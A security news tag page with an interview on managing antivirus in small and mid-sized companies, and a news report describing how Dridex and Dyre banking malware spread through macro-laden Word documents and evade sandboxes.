Tag Archives: antivirus

The Need for a Security Mindset

Keeping antivirus software protection current on all company-owned computing devices has become an essential business practice. That’s not a simple endeavor.

ThirdCertainty recently sat down with Andy Hayter, security evangelist at antivirus vendor G Data Software, to discuss the intricacies of managing antivirus solutions effectively, particularly in small and mid-sized companies. (Answers edited for clarity and length.)

3C: With hackers updating their virus signatures almost minute-to-minute, why do companies still need antivirus protection?

Hayter: One of the myths out there today is that antivirus is dead. But the good news is that antivirus software today isn’t just signature-based. It includes heuristic technology that looks at the characteristics of a piece of software executing on your computer.

So in many cases, even though a particular piece of malware may not necessarily have been identified through a signature, it can easily be identified through the heuristics.

Security & Privacy Weekly News Roundup: Stay informed of key patterns and trends

3C: As a business owner or manager, if I’m implementing my antivirus solution on my own, what should I know?

andy hayter
Andy Hayter, G Data Software security evangelist

Hayter: Having a management interface is important, so that you can manage all devices and deploy the antivirus software out to all your devices and keep it maintained and updated. Your vendor should offer training to your key personnel.

It’s important for them to understand how to manage threats, and understand what’s going on in your network environment from a malicious software perspective.

3C: Is relying on my IT department to take charge of security wise?

Hayter: Most small and mid-sized companies are going to look at the IT department to do this. They are not large enough to have a separate security function. The CEO and CFO still must fully understand the impact malware can have.

3C: What about outsourcing security?

Hayter: Many smaller companies don’t have the time or resources to get someone up to speed and trained, or even multiple people trained, because this is a 24-hour type of situation. So more companies are looking at managed security Service (MSS) providers to take this on for them. This entails a solution that a third party manages remotely through a remote management console.

So it depends on whether the business has the time and the money to train people or wants to outsource this to a professional whose business is security. Either way, you still need to train your IT staff so they know the fundamentals of security and can protect the business in an emergency.

3C: So I can’t just outsource and wash my hands of security?

Hayter: No. You cannot wash your hands of security. Your managed security service provider is there for you, but you still have to understand the basics. You still have to perform the training. And you still are the person on site to talk to your employees about situations that might occur at 8:30 in the morning when they log on their PC and get a strange e-mail.

3C: Establishing a security mind-set for my company is a day-to-day thing?

Hayter: Right. If you do outsource your security, you cannot just forget about it and pray that it’s done completely. You still need to train your employees and help them understand that bad things can happen to them.

Financial Malware Uses Macros to Infect

A new breed of financially focused malware has cropped up, using new tactics to evade detection and infect harder-to-compromise systems.

The Dyre botnet has successfully compromised tens of thousands of victims in North America. Another banking trojan, Dridex, has successfully compromised thousands of systems in Europe and is increasingly targeting companies and users in the U.S. by sending Word documents carrying malicious macro scripts capable of installing the malware.

Security & Privacy News Roundup: Stay informed of key patterns and trends

Cloud-based security provider Proofpoint has focused on Dridex since it appeared late last year, tracking efforts by the groups to target companies with Dridex-laden spam. The attackers send out waves of spam every two or three days, using anywhere from two different e-mail templates to more than 1,000, depending on the group behind the attack.

The attacks usually last no longer than five hours, and few, if any, antivirus scanners detect the malware in time, says Wayne Huang, vice president of engineering at Proofpoint.

“I would say that they are persistent, but they are not APT (an advanced persistent threat) in that they are not focusing on certain organizations,” he says. “They spread malware primarily to monetize.”

The rapidly changing templates and the use of macros within Word documents are just two of the techniques that Dridex uses to be an efficient infector. More recent versions of the banking malware have used images to track the number of downloads, and the developers also have added features to foil detection and analysis by automated systems.

A number of anti-malware systems open suspicious files or run potentially questionable code in a virtual environment to check for malicious behavior. Yet, attackers have found ways to detect whether their code is running in such a “sandbox.” Initial attempts, for example, would just sleep for an hour or a day, because automated systems typically only executed the code for a few minutes.

Most current efforts, however, focus on the anomalies in the system in which the program is running. The developers behind the Dyre malware, for example, used a simple command to count the number of cores being used. Many virtual environments only use a single core for efficency, while multi-core systems are now ubiquitous.

Dridex, however, took a simpler tack: Because analysis systems tend to open the suspicious file and wait for any anomalous activity, Dridex is programmed to only execute when the malicious Word document is closed.

The evolution of Dridex has made it an effective vehicle for attacks, says Matt Huang, vice president of product management at Proofpoint.

“They have been really mutating their techniques, especially to avoid sandbox detection,” he says. “From very early on, they would change e-mail subjects and file titles. Now, we see a greater variety of techniques.”

A single attack often will result in hundreds of thousands of e-mails being sent out. The attackers have at least 1.3 billion e-mail addresses from which to choose, Huang says.

The attackers also are beginning to zero in on other financial targets, such as cryptocurrencies. In some cases, Dridex has downloaded a trojan known as Pony that can steal more than 30 different cryptocurrencies, such as Bitcoin, from a dozen different types of digital wallets.

“Recently, they have been using Pony to steal wallets, because the use of virtual currency has picked up,” Huang says. “They have been quite successful.”